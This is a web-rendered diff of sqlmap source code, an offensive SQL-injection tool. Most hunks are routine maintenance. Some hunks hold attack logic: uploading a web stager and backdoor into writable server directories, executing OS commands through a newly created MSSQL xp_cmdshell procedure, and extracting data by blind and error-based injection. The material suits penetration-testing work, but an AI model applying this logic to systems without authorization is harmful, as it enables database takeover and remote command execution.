||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import urlparse
|
|
||||||
import os
|
import os
|
||||||
|
import posixpath
|
||||||
import re
|
import re
|
||||||
import StringIO
|
import StringIO
|
||||||
|
import urlparse
|
||||||
|
|
||||||
from tempfile import mkstemp
|
from tempfile import mkstemp
|
||||||
|
|
||||||
|
@ -130,7 +131,7 @@ class Web:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
def _webFileInject(self, fileContent, fileName, directory):
|
def _webFileInject(self, fileContent, fileName, directory):
|
||||||
outFile = ntToPosixSlashes(os.path.join(directory, fileName))
|
outFile = posixpath.join(ntToPosixSlashes(directory), fileName)
|
||||||
uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
|
uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
|
||||||
query = ""
|
query = ""
|
||||||
|
|
||||||
|
@ -203,15 +204,15 @@ class Web:
|
||||||
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
|
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
|
||||||
backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))
|
backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))
|
||||||
|
|
||||||
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
|
|
||||||
stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
|
stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
|
||||||
success = False
|
success = False
|
||||||
|
|
||||||
for directory in directories:
|
for directory in directories:
|
||||||
self.webStagerFilePath = ntToPosixSlashes(os.path.join(directory, stagerName))
|
if not directory:
|
||||||
|
continue
|
||||||
|
|
||||||
if success:
|
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
|
||||||
break
|
self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
|
||||||
|
|
||||||
uploaded = False
|
uploaded = False
|
||||||
directory = ntToPosixSlashes(normalizePath(directory))
|
directory = ntToPosixSlashes(normalizePath(directory))
|
||||||
|
@ -221,6 +222,9 @@ class Web:
|
||||||
else:
|
else:
|
||||||
directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory
|
directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory
|
||||||
|
|
||||||
|
if not directory.endswith('/'):
|
||||||
|
directory += '/'
|
||||||
|
|
||||||
# Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
|
# Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
|
||||||
infoMsg = "trying to upload the file stager on '%s' " % directory
|
infoMsg = "trying to upload the file stager on '%s' " % directory
|
||||||
infoMsg += "via LIMIT 'LINES TERMINATED BY' method"
|
infoMsg += "via LIMIT 'LINES TERMINATED BY' method"
|
||||||
|
@ -251,13 +255,16 @@ class Web:
|
||||||
infoMsg += "via UNION method"
|
infoMsg += "via UNION method"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
|
||||||
|
self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
|
||||||
|
|
||||||
handle, filename = mkstemp()
|
handle, filename = mkstemp()
|
||||||
os.fdopen(handle).close() # close low level handle (causing problems later)
|
os.fdopen(handle).close() # close low level handle (causing problems later)
|
||||||
|
|
||||||
with open(filename, "w+") as f:
|
with open(filename, "w+") as f:
|
||||||
_ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
|
_ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
|
||||||
_ = _.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
|
_ = _.replace("WRITABLE_DIR", utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory))
|
||||||
f.write(utf8encode(_))
|
f.write(_)
|
||||||
|
|
||||||
self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)
|
self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)
|
||||||
|
|
||||||
|
@ -275,18 +282,7 @@ class Web:
|
||||||
uploaded = True
|
uploaded = True
|
||||||
break
|
break
|
||||||
|
|
||||||
# Extra check - required
|
|
||||||
if not uploaded:
|
if not uploaded:
|
||||||
self.webBaseUrl = "%s://%s:%d/" % (conf.scheme, conf.hostname, conf.port)
|
|
||||||
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
|
|
||||||
|
|
||||||
debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
|
|
||||||
logger.debug(debugMsg)
|
|
||||||
|
|
||||||
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
|
|
||||||
uplPage = uplPage or ""
|
|
||||||
|
|
||||||
if "sqlmap file uploader" not in uplPage:
|
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if "<%" in uplPage or "<?" in uplPage:
|
if "<%" in uplPage or "<?" in uplPage:
|
||||||
|
@ -340,10 +336,10 @@ class Web:
|
||||||
else:
|
else:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
self.webBackdoorUrl = ntToPosixSlashes(os.path.join(self.webBaseUrl, backdoorName))
|
self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName)
|
||||||
self.webDirectory = directory
|
self.webDirectory = directory
|
||||||
|
|
||||||
self.webBackdoorFilePath = ntToPosixSlashes(os.path.join(directory, backdoorName))
|
self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName)
|
||||||
|
|
||||||
testStr = "command execution test"
|
testStr = "command execution test"
|
||||||
output = self.webBackdoorRunCmd("echo %s" % testStr)
|
output = self.webBackdoorRunCmd("echo %s" % testStr)
|
||||||
|
|
|
@ -1,12 +1,13 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
from lib.core.agent import agent
|
from lib.core.agent import agent
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
|
from lib.core.common import flattenValue
|
||||||
from lib.core.common import getLimitRange
|
from lib.core.common import getLimitRange
|
||||||
from lib.core.common import getSQLSnippet
|
from lib.core.common import getSQLSnippet
|
||||||
from lib.core.common import hashDBWrite
|
from lib.core.common import hashDBWrite
|
||||||
|
@ -51,10 +52,9 @@ class Xp_cmdshell:
|
||||||
inject.goStacked(agent.runAsDBMSUser(cmd))
|
inject.goStacked(agent.runAsDBMSUser(cmd))
|
||||||
|
|
||||||
self._randStr = randomStr(lowercase=True)
|
self._randStr = randomStr(lowercase=True)
|
||||||
self._xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
|
self.xpCmdshellStr = "master..new_xp_cmdshell"
|
||||||
self.xpCmdshellStr = "master..%s" % self._xpCmdshellNew
|
|
||||||
|
|
||||||
cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr, XP_CMDSHELL_NEW=self._xpCmdshellNew)
|
cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr)
|
||||||
|
|
||||||
if Backend.isVersionWithin(("2005", "2008")):
|
if Backend.isVersionWithin(("2005", "2008")):
|
||||||
cmd += ";RECONFIGURE WITH OVERRIDE"
|
cmd += ";RECONFIGURE WITH OVERRIDE"
|
||||||
|
@ -142,13 +142,13 @@ class Xp_cmdshell:
|
||||||
charCounter += len(echoedLine)
|
charCounter += len(echoedLine)
|
||||||
|
|
||||||
if charCounter >= maxLen:
|
if charCounter >= maxLen:
|
||||||
self.xpCmdshellExecCmd(cmd)
|
self.xpCmdshellExecCmd(cmd.rstrip(" & "))
|
||||||
|
|
||||||
cmd = ""
|
cmd = ""
|
||||||
charCounter = 0
|
charCounter = 0
|
||||||
|
|
||||||
if cmd:
|
if cmd:
|
||||||
self.xpCmdshellExecCmd(cmd)
|
self.xpCmdshellExecCmd(cmd.rstrip(" & "))
|
||||||
|
|
||||||
def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
|
def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
|
||||||
# When user provides DBMS credentials (with --dbms-cred) we need to
|
# When user provides DBMS credentials (with --dbms-cred) we need to
|
||||||
|
@ -226,12 +226,16 @@ class Xp_cmdshell:
|
||||||
inject.goStacked("DELETE FROM %s" % self.cmdTblName)
|
inject.goStacked("DELETE FROM %s" % self.cmdTblName)
|
||||||
|
|
||||||
if output and isListLike(output) and len(output) > 1:
|
if output and isListLike(output) and len(output) > 1:
|
||||||
if not (output[0] or "").strip():
|
_ = ""
|
||||||
output = output[1:]
|
lines = [line for line in flattenValue(output) if line is not None]
|
||||||
elif not (output[-1] or "").strip():
|
|
||||||
output = output[:-1]
|
|
||||||
|
|
||||||
output = "\n".join(line for line in filter(None, output))
|
for i in xrange(len(lines)):
|
||||||
|
line = lines[i] or ""
|
||||||
|
if line is None or i in (0, len(lines) - 1) and not line.strip():
|
||||||
|
continue
|
||||||
|
_ += "%s\n" % line
|
||||||
|
|
||||||
|
output = _.rstrip('\n')
|
||||||
|
|
||||||
return output
|
return output
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -59,6 +59,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||||
"""
|
"""
|
||||||
|
|
||||||
abortedFlag = False
|
abortedFlag = False
|
||||||
|
showEta = False
|
||||||
partialValue = u""
|
partialValue = u""
|
||||||
finalValue = None
|
finalValue = None
|
||||||
retrievedLength = 0
|
retrievedLength = 0
|
||||||
|
@ -313,8 +314,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||||
errMsg = "invalid character detected. retrying.."
|
errMsg = "invalid character detected. retrying.."
|
||||||
logger.error(errMsg)
|
logger.error(errMsg)
|
||||||
|
|
||||||
|
if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE:
|
||||||
conf.timeSec += 1
|
conf.timeSec += 1
|
||||||
|
|
||||||
warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '')
|
warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '')
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -116,7 +116,7 @@ def tableExists(tableFile, regex=None):
|
||||||
|
|
||||||
if conf.verbose in (1, 2) and not hasattr(conf, "api"):
|
if conf.verbose in (1, 2) and not hasattr(conf, "api"):
|
||||||
clearConsoleLine(True)
|
clearConsoleLine(True)
|
||||||
infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table))
|
infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table))
|
||||||
dataToStdout(infoMsg, True)
|
dataToStdout(infoMsg, True)
|
||||||
|
|
||||||
if conf.verbose in (1, 2):
|
if conf.verbose in (1, 2):
|
||||||
|
@ -224,11 +224,11 @@ def columnExists(columnFile, regex=None):
|
||||||
|
|
||||||
if conf.verbose in (1, 2) and not hasattr(conf, "api"):
|
if conf.verbose in (1, 2) and not hasattr(conf, "api"):
|
||||||
clearConsoleLine(True)
|
clearConsoleLine(True)
|
||||||
infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
|
infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
|
||||||
dataToStdout(infoMsg, True)
|
dataToStdout(infoMsg, True)
|
||||||
|
|
||||||
if conf.verbose in (1, 2):
|
if conf.verbose in (1, 2):
|
||||||
status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
|
status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
|
||||||
dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True)
|
dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True)
|
||||||
|
|
||||||
kb.locks.io.release()
|
kb.locks.io.release()
|
||||||
|
@ -257,9 +257,9 @@ def columnExists(columnFile, regex=None):
|
||||||
result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column)))
|
result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column)))
|
||||||
|
|
||||||
if result:
|
if result:
|
||||||
columns[column] = 'numeric'
|
columns[column] = "numeric"
|
||||||
else:
|
else:
|
||||||
columns[column] = 'non-numeric'
|
columns[column] = "non-numeric"
|
||||||
|
|
||||||
kb.data.cachedColumns[conf.db] = {conf.tbl: columns}
|
kb.data.cachedColumns[conf.db] = {conf.tbl: columns}
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -98,7 +98,7 @@ def dnsUse(payload, expression):
|
||||||
retVal = output
|
retVal = output
|
||||||
|
|
||||||
if kb.dnsTest is not None:
|
if kb.dnsTest is not None:
|
||||||
dataToStdout("[%s] [INFO] %s: %s\r\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))
|
dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))
|
||||||
|
|
||||||
if count > 0:
|
if count > 0:
|
||||||
hashDBWrite(expression, output)
|
hashDBWrite(expression, output)
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -74,7 +74,7 @@ def _oneShotErrorUse(expression, field=None):
|
||||||
try:
|
try:
|
||||||
while True:
|
while True:
|
||||||
check = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
|
check = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
|
||||||
trimcheck = "%s(?P<result>.*?)</" % (kb.chars.start)
|
trimcheck = "%s(?P<result>[^<]*)" % (kb.chars.start)
|
||||||
|
|
||||||
if field:
|
if field:
|
||||||
nulledCastedField = agent.nullAndCastField(field)
|
nulledCastedField = agent.nullAndCastField(field)
|
||||||
|
@ -130,6 +130,16 @@ def _oneShotErrorUse(expression, field=None):
|
||||||
warnMsg += safecharencode(trimmed)
|
warnMsg += safecharencode(trimmed)
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
if not kb.testMode:
|
||||||
|
check = "(?P<result>.*?)%s" % kb.chars.stop[:2]
|
||||||
|
output = extractRegexResult(check, trimmed, re.IGNORECASE)
|
||||||
|
|
||||||
|
if not output:
|
||||||
|
check = "(?P<result>[^\s<>'\"]+)"
|
||||||
|
output = extractRegexResult(check, trimmed, re.IGNORECASE)
|
||||||
|
else:
|
||||||
|
output = output.rstrip()
|
||||||
|
|
||||||
if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)):
|
if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)):
|
||||||
if offset == 1:
|
if offset == 1:
|
||||||
retVal = output
|
retVal = output
|
||||||
|
@ -271,7 +281,7 @@ def errorUse(expression, dump=False):
|
||||||
# Count the number of SQL query entries output
|
# Count the number of SQL query entries output
|
||||||
countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1)
|
countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1)
|
||||||
|
|
||||||
if " ORDER BY " in expression.upper():
|
if " ORDER BY " in countedExpression.upper():
|
||||||
_ = countedExpression.upper().rindex(" ORDER BY ")
|
_ = countedExpression.upper().rindex(" ORDER BY ")
|
||||||
countedExpression = countedExpression[:_]
|
countedExpression = countedExpression[:_]
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user